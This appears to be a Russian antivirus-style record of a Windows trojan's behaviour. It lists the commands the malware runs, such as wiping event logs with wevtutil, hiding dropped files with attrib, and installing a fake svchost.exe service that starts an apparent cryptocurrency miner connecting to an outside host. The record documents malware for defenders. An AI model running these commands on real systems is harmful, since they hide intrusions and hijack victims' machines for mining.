Техническая информация
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\tem.vbs"
- '<SYSTEM32>\cmd.exe' /c wevtutil cl system
- '<SYSTEM32>\attrib.exe' +s +h +r %WINDIR%\Media\svchost.exe
- '<SYSTEM32>\cmd.exe' /c wevtutil cl application
- '<SYSTEM32>\attrib.exe' +s +h +r %WINDIR%\Media\Systen.exe
- '<SYSTEM32>\cmd.exe' /c wevtutil.exe cl Setup
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Media\svchost.exe start WindowsMedia
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Media\svchost.exe install WindowsMedia Systen.exe -o bcc.appel86.org:7777 -u 496ogd9qnnc6Hs2KADUZNGFB3BbVVSCEw3FQgrQJN3DrfcvZkMf4sVt8xagLsGK4HkZzGMGgc2WmMQwCAi8Xtqzi6G9vWpN -t 1
- '<SYSTEM32>\cmd.exe' /c @attrib +s +h +r %WINDIR%\Media\svchost.exe
- '<SYSTEM32>\cmd.exe' /c wevtutil cl security
- '<SYSTEM32>\cmd.exe' /c @attrib +s +h +r %WINDIR%\Media\Systen.exe
- <Текущая директория>\tem.vbs
- %WINDIR%\Media\Systen.exe
- %WINDIR%\Media\svchost.exe
- %WINDIR%\Media\Systen.exe
- <Текущая директория>\tem.vbs
- %WINDIR%\Media\svchost.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''